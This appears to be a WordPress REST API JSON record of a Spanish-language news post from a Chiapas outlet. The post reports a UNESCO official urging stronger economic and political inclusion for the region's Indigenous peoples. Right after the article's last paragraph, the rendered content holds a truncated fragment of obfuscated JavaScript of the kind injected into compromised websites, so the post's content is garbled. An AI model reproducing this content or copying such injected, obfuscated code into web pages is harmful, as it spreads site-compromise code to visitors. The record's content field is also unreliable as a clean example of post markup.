{"id":4443,"date":"2022-08-16T03:56:29","date_gmt":"2022-08-16T03:56:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4443"},"modified":"2022-08-16T03:56:30","modified_gmt":"2022-08-16T03:56:30","slug":"piden-fortalecer-proyectos-de-inclusion-economica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4443","title":{"rendered":"Piden fortalecer proyectos de inclusi\u00f3n econ\u00f3mica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-15-at-1.41.10-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-4444\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-15-at-1.41.10-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-15-at-1.41.10-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-15-at-1.41.10-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-15-at-1.41.10-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mezSan Crist\u00f3bal de Las Casas.-&#8220;No hay participaci\u00f3n efectiva y hay que establecer cu\u00e1les son las bases m\u00ednimas que garanticen la participaci\u00f3n efectiva de alguien que realmente pertenezca a un pueblo originario, no se est\u00e1 cumpliendo como debe de ser\u201d. As\u00ed lo dijo Javier L\u00f3pez S\u00e1nchez, Director de Desarrollo Sostenible de la Unesco para Am\u00e9rica Latina y el Caribe, tras considerar necesario fortalecer la ejecuci\u00f3n de proyectos de inclusi\u00f3n que abonen al desarrollo econ\u00f3mico, pol\u00edtico y cultural de los pueblos originarios de Chiapas. En entrevista, coment\u00f3 que se encuentra haciendo un an\u00e1lisis sobre la situaci\u00f3n de los pueblos originarios de Chiapas, en particular, ya que considera importante reconocer cu\u00e1l es el estado de los pueblos en el \u00e1mbito de desarrollo social, educaci\u00f3n, acceso a la salud, a la justicia, entre otros aspectos. &#8220;Todo lo que tiene que ver con la parte cultural, la econom\u00eda, la parte propiamente pol\u00edtica, son  cuatro ejes, adem\u00e1s de temas puntuales que tienen que ver con este proceso de auto adscripci\u00f3n calificada en procesos electorales, los derechos pol\u00edticos&#8221;, agreg\u00f3. En este \u00faltimo aspecto dijo tiene miras al 2024, ya que ha habido una exclusi\u00f3n desde la narrativa jur\u00eddica del Estado Mexicano, y eso ha llevado a la exclusi\u00f3n en todos los \u00e1mbitos sobre todo en el econ\u00f3mico y en el pol\u00edtico. \u201cEstamos impulsando procesos de inclusi\u00f3n, nosotros promovemos el desarrollo y ahora promovemos la participaci\u00f3n pol\u00edtica de la sociedad, hacemos conciencia social de participaci\u00f3n efectiva, porque hay apat\u00eda de la sociedad y los pol\u00edticos van hacer lo que quieran y la sociedad se debe involucrar m\u00e1s&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mezSan Crist\u00f3bal de Las Casas.-&#8220;No hay participaci\u00f3n efectiva y hay que establecer cu\u00e1les son las bases m\u00ednimas que garanticen la participaci\u00f3n efectiva de alguien que realmente pertenezca a un pueblo originario, no se est\u00e1 cumpliendo como debe de ser\u201d. As\u00ed lo dijo Javier L\u00f3pez S\u00e1nchez, Director de Desarrollo Sostenible de la Unesco para Am\u00e9rica &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4444,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4443","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4443","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4443"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4443\/revisions"}],"predecessor-version":[{"id":4445,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4443\/revisions\/4445"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4444"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4443"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4443"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4443"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}